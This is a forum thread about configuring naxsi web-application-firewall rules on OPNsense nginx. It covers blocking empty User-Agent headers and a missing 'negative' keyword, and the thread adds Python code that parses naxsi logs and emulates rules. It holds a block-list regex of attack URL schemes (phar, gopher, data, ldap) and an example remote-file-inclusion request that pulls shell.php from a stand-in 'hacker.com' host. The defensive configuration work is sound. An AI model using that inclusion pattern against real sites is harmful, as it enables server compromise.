OPNsense Forum
English Forums => Web Proxy Filtering and Caching => Topic started by: akong77 on November 05, 2020, 02:42:39 am
-
Hello,
I know nginx can use a hook to block an empty User-Agent. I want to know whether naxsi can support it?
-
it should
maybe something like:
MainRule negative id:1700 "rx:^(?!\s*$).+" "msg:Empty_UA" "mz:$HEADERS_VAR_X:User-Agent"
not tested
-
OK, I will test it. Thanks a lot.
-
I tested it. It can't block it.
-
tested it. works:
curl -H "User-Agent;" http://myCA_CRL_URL
*32507 NAXSI_EXLOG: ip=some_ip&server=my_server&uri=%2Fcrl_file&id=1700&zone=HEADERS&var_name=user-agent&content=, client: some_ip, server: my_server, request: "GET /my.crl HTTP/1.1", host: "my_server"
-
If you try
curl -A '' -H 'User-Agent;' http://web -I
-
Sorry, I made a mistake. It can block it. Thanks a lot.
I want to know about naxsi: it offers the option to drop the connection. What is the difference between "block request" and "drop connection"? I tested it and I see no difference.
-
https://github.com/nbs-system/naxsi/wiki/rules-bnf
specify an action such as BLOCK (blocks the request in non-learning mode) or DROP (blocks the request even in learning mode)
DROP is not "DROP connection". it's block even in learning mode
-
So, whether I choose block request or drop connection, it always shows the OPNsense request denied web page.
Right?
-
yep
-
it should
maybe something like:
MainRule negative id:1700 "rx:^(?!\s*$).+" "msg:Empty_UA" "mz:$HEADERS_VAR_X:User-Agent"
not tested
Hello, I tested it.
If I use a browser like Firefox to view http://ab.aspa.idv.tw, it also shows Request Denied.
You can check http://ab.aspa.idv.tw
-
and what's in the "HTTP Error logs" for these requests?
-
*19 NAXSI_FMT: ip=219.84.34.52&server=ab.aspa.idv.tw&uri=/&learning=0&vers=0.56&total_processed=12&total_blocked=10&block=1&cscore0=$policy20906cd5e25e413f9fe6e733c38d3586&score0=16&zone0=HEADERS&id0=15001&var_name0=user-agent&zone1=HEADERS|NAME&id1=15001&var_name1=user-agent, client: 219.84.34.52, server: ab.aspa.idv.tw, request: "GET / HTTP/1.1", host: "ab.aspa.idv.tw"
*19 NAXSI_FMT: ip=219.84.34.52&server=ab.aspa.idv.tw&uri=/favicon.ico&learning=0&vers=0.56&total_processed=13&total_blocked=11&block=1&cscore0=$policy20906cd5e25e413f9fe6e733c38d3586&score0=16&zone0=HEADERS&id0=15001&var_name0=user-agent&zone1=HEADERS|NAME&id1=15001&var_name1=user-agent, client: 219.84.34.52, server: ab.aspa.idv.tw, request: "GET /favicon.ico HTTP/1.1", host: "ab.aspa.idv.tw", referrer: "http://ab.aspa.idv.tw/"
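As an added example (not part of the thread and not naxsi's own code), the following Python parses the NAXSI_FMT lines posted above plus the NAXSI_EXLOG line from earlier in the thread, and reports which rule ID fired in which zone. It shows why score0=16 appears: rule 15001 matched twice on the same request, once in the HEADERS zone (the header value) and once in HEADERS|NAME (the header name). The log lines are copied from the thread with its redactions kept; the split on `, client: ` assumes the nginx error_log suffix seen in those lines.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Shape of a naxsi line in the nginx error log (as seen in this thread):
#   <conn> NAXSI_FMT|NAXSI_EXLOG: k=v&k=v..., client: IP, server: NAME, request: "..." [, host: "..."]
LINE_RE = re.compile(
    r'NAXSI_(?P<kind>FMT|EXLOG): (?P<kv>.*?), client: (?P<client>\S+), '
    r'server: (?P<srv>\S+), request: "(?P<request>[^"]*)"'
)
# FMT indexes matches as zone0/id0/var_name0, zone1/...; EXLOG has one un-indexed set.
IDX_KEY = re.compile(r'^(zone|id|var_name)(\d*)$')

# Log lines copied from the thread (IPs/hostnames as redacted by the poster).
SAMPLE_LOG_LINES = [
    '*19 NAXSI_FMT: ip=219.84.34.52&server=ab.aspa.idv.tw&uri=/&learning=0&vers=0.56&total_processed=12&total_blocked=10&block=1&cscore0=$policy20906cd5e25e413f9fe6e733c38d3586&score0=16&zone0=HEADERS&id0=15001&var_name0=user-agent&zone1=HEADERS|NAME&id1=15001&var_name1=user-agent, client: 219.84.34.52, server: ab.aspa.idv.tw, request: "GET / HTTP/1.1", host: "ab.aspa.idv.tw"',
    '*19 NAXSI_FMT: ip=219.84.34.52&server=ab.aspa.idv.tw&uri=/favicon.ico&learning=0&vers=0.56&total_processed=13&total_blocked=11&block=1&cscore0=$policy20906cd5e25e413f9fe6e733c38d3586&score0=16&zone0=HEADERS&id0=15001&var_name0=user-agent&zone1=HEADERS|NAME&id1=15001&var_name1=user-agent, client: 219.84.34.52, server: ab.aspa.idv.tw, request: "GET /favicon.ico HTTP/1.1", host: "ab.aspa.idv.tw", referrer: "http://ab.aspa.idv.tw/"',
    '*32507 NAXSI_EXLOG: ip=some_ip&server=my_server&uri=%2Fcrl_file&id=1700&zone=HEADERS&var_name=user-agent&content=, client: some_ip, server: my_server, request: "GET /my.crl HTTP/1.1", host: "my_server"',
]


def parse_naxsi_line(line):
    """Return a dict describing one NAXSI_FMT/NAXSI_EXLOG line, or None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    # naxsi URL-encodes values (uri=%2Fcrl_file); parse_qsl decodes them.
    fields = dict(parse_qsl(m.group('kv'), keep_blank_values=True))
    grouped = {}
    for key, value in fields.items():
        km = IDX_KEY.match(key)
        if km:
            grouped.setdefault(km.group(2), {})[km.group(1)] = value
    matches = [grouped[i] for i in sorted(grouped, key=lambda s: int(s or 0))]
    return {
        'kind': m.group('kind'),
        'ip': fields.get('ip'),
        'server': fields.get('server'),
        'uri': fields.get('uri'),
        'request': m.group('request'),
        'learning': fields.get('learning') == '1',
        'blocked': fields.get('block') == '1',   # FMT only; EXLOG has no block= field
        'matches': matches,
        'content': fields.get('content'),        # EXLOG only: the offending value
    }


def rules_fired(lines):
    """Count (rule id, zone, var_name) across blocked NAXSI_FMT lines."""
    counts = Counter()
    for line in lines:
        parsed = parse_naxsi_line(line)
        if parsed and parsed['kind'] == 'FMT' and parsed['blocked']:
            for mt in parsed['matches']:
                counts[(mt.get('id'), mt.get('zone'), mt.get('var_name'))] += 1
    return counts


def exlog_contents(lines):
    """(rule id, var_name, matched content) for each NAXSI_EXLOG line."""
    out = []
    for line in lines:
        parsed = parse_naxsi_line(line)
        if parsed and parsed['kind'] == 'EXLOG':
            for mt in parsed['matches']:
                out.append((mt.get('id'), mt.get('var_name'), parsed['content']))
    return out


if __name__ == '__main__':
    for key, n in rules_fired(SAMPLE_LOG_LINES).most_common():
        print(f'id={key[0]} zone={key[1]} var={key[2]} hits={n}')
    print(exlog_contents(SAMPLE_LOG_LINES))
```

Run against a real error.log, the Counter makes a rule that fires on every request (as 15001 does here, on both value and name of User-Agent) stand out immediately; the EXLOG output shows the actual matched content, which for the empty-UA case is an empty string.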
-
zone1=HEADERS|NAME
and what exactly does rule 15001 look like?
and can you enable "Extensive Naxsi Log" in server properties and post NAXSI_EXLOG log for blocked request?
-
MainRule id:15001 "rx:^(?!\s*$).+" "msg:Empty UA" "mz:$HEADERS_VAR_X:User-Agent" "s:$policy20906cd5e25e413f9fe6e733c38d3586:8";
-
and can you enable "Extensive Naxsi Log" in server properties and post NAXSI_EXLOG log for blocked request?
Where is this set up? On OPNsense, or on the web server?
-
MainRule id:15001 "rx:^(?!\s*$).+" "msg:Empty UA" "mz:$HEADERS_VAR_X:User-Agent"
forgot to negate? now you're blocking any request with a non-empty UA header
MainRule negative id:15001 "rx:^(?!\s*$).+"
"negative" to block requests that do not satisfy non-empty UA
Where is this set up? On OPNsense, or on the web server?
OPN->services->Nginx->configuration->Edit HTTP Server->advanced mode
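As an added example (not from the thread and not naxsi's code), the following Python emulates how a single MainRule with `mz:$HEADERS_VAR_X:User-Agent` decides requests with and without the `negative` keyword, using header values like the ones the thread's curl and Firefox tests send. The per-hit score of 8 comes from the rule posted above; the CheckRule threshold of 8 and the fact that only headers actually present in the request are evaluated are assumptions made for the emulation. Sample requests are constructed.

```python
import re

# Regex from the thread's rule: matches any value that is not empty or whitespace-only.
UA_RE = re.compile(r"^(?!\s*$).+")


def rule_fires(value: str, negative: bool) -> bool:
    """One naxsi-style match: a plain rule fires when the regex matches;
    a `negative` rule fires when the regex does NOT match."""
    matched = UA_RE.search(value) is not None
    return (not matched) if negative else matched


def evaluate(headers: dict, negative: bool, score: int = 8, threshold: int = 8) -> dict:
    """Emulate MainRule ... "mz:$HEADERS_VAR_X:User-Agent" "s:$policy:8" followed by a
    CheckRule "$policy >= 8" BLOCK.  The threshold is an assumption (the thread does not
    show the generated CheckRule), and so is evaluating only headers that are present:
    a request with no User-Agent header at all is not decided by this emulation."""
    total = 0
    for name, value in headers.items():
        if name.lower() == "user-agent" and rule_fires(value, negative):
            total += score
    return {"score": total, "blocked": total >= threshold}


# Constructed requests mirroring the thread's tests:
#   curl -H "User-Agent;"  -> header present with an empty value
#   plain curl / Firefox   -> a normal, non-empty User-Agent
SAMPLES = {
    "empty_ua": {"Host": "ab.aspa.idv.tw", "User-Agent": ""},
    "blank_ua": {"Host": "ab.aspa.idv.tw", "User-Agent": "   "},
    "curl":     {"Host": "ab.aspa.idv.tw", "User-Agent": "curl/7.72.0"},
    "firefox":  {"Host": "ab.aspa.idv.tw",
                 "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0"},
}


def decision_table(negative: bool) -> dict:
    """Which sample requests the rule variant blocks."""
    return {name: evaluate(hdrs, negative)["blocked"] for name, hdrs in SAMPLES.items()}


if __name__ == "__main__":
    print("plain    :", decision_table(False))   # blocks curl and firefox, lets empty UA through
    print("negative :", decision_table(True))    # blocks empty/blank UA only
```

The plain variant is exactly the situation in the logs above: every browser request scores 8 or more and is denied, while the empty User-Agent the rule was meant to catch passes. Adding `negative` inverts the match so only empty or whitespace-only values are scored.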
-
Ohh... Sorry, I missed this option. Thanks a lot.
-
Please see the following:
MainRule id:10000 "str:gopher|doc|php|glob|file|phar|zlib|ftp|ldap|dict|ogg|data\:\/" "msg:URL charset" "mz:URL" "s:$policy1a275df7733e4aef813ecb4917637d40:8"
I want to block some strings in the URL. Could I have set it up wrong?
-
"str:gopher|doc|php|glob|file|phar|zlib|ftp|ldap|dict|ogg|data\:\/"
since you use a regex it should be "rx:" not "str:"
what is the "\:\/" part for?
-
Sorry, here is the full rule, fixed:
MainRule id:10000 "rx:(gopher|doc|php|glob|file|phar|zlib|ftp|ldap|dict|ogg|data)\:\/" "msg:URL charset" "mz:URL" "s:$policy1a275df7733e4aef813ecb4917637d40:8";
I want to block URLs containing a string like ftp:/ or ldap:/. I have changed it to rx. Is that right?
-
regex looks fine but
can you show an example of url you want to block?
the URL zone contains the string between the server name and the first "?" sign (i.e. if https://forum.opnsense.org/index.php?action=post is requested then URL = /index.php, and "action" is an Argument. Arguments of a POST request are in the BODY zone).
so what exactly you want to block?
-
like
http://url/php:/
-
hm. if the question is theoretical, then yes, the rule should work.
but RFI (remote file inclusion) works through parameters (arguments), not the URL itself
(i.e. http://www.example.com/vuln_page.php?file=http://www.hacker.com/shell.php)
and naxsi has examples of obvious RFI protection (IDs 1100-1199)
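As an added example (not from the thread and not naxsi's code), the following Python splits a request target into the URL zone and the ARGS zone the way the post above describes, then applies the regex from rule 10000 only to the zones named in a rule's mz. It shows that the rule as written (mz:URL) catches `/php:/` but not a scheme smuggled in a query argument, and also that the RFI example above would not match even with ARGS in the match zone, because `http` is not in the rule's alternation. Request targets other than the two quoted in the thread are constructed; BODY (POST arguments) is not modelled.

```python
import re
from urllib.parse import parse_qsl, unquote

# Regex from the thread's rule 10000 (mz:URL)
SCHEME_RE = re.compile(r"(gopher|doc|php|glob|file|phar|zlib|ftp|ldap|dict|ogg|data)\:\/")


def split_zones(request_target: str) -> dict:
    """URL zone = path before the first '?'; ARGS zone = decoded query pairs.
    The BODY zone (POST arguments) is out of scope for this emulation."""
    path, has_query, query = request_target.partition("?")
    args = parse_qsl(query, keep_blank_values=True) if has_query else []
    return {"URL": unquote(path), "ARGS": args}


def rule_10000_hits(request_target: str, zones=("URL",)) -> list:
    """Apply the rule's regex to the zones listed in its mz (default: URL only,
    as in the thread).  Returns (zone, matched location) pairs."""
    z = split_zones(request_target)
    hits = []
    if "URL" in zones and SCHEME_RE.search(z["URL"]):
        hits.append(("URL", z["URL"]))
    if "ARGS" in zones:
        for name, value in z["ARGS"]:
            if SCHEME_RE.search(value):
                hits.append(("ARGS", name))
    return hits


# The two request targets quoted in the thread, plus a constructed ftp:// variant.
REQUESTS = [
    "/php:/",
    "/vuln_page.php?file=http://www.hacker.com/shell.php",
    "/vuln_page.php?file=ftp://files.example/shell.php",   # constructed
]

if __name__ == "__main__":
    for target in REQUESTS:
        print(target)
        print("  mz:URL       ->", rule_10000_hits(target))
        print("  mz:URL|ARGS  ->", rule_10000_hits(target, zones=("URL", "ARGS")))
```

The third case is the one to notice: a rule that only inspects the URL zone never sees `ftp://` in the `file` argument, which is where RFI payloads actually travel; that is why naxsi's own RFI rules target ARGS and BODY rather than URL.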
-
Hello,
Could I redirect the client to a 403 page when a rule matches?
-
I did not understand the question.
you want to send a 403 status? change the HTML page?
yes you can
https://github.com/nbs-system/naxsi/wiki/directives#deniedurl
when rule match?
when access is blocked.
DeniedUrl is a directive in the location block. you can't set it for one rule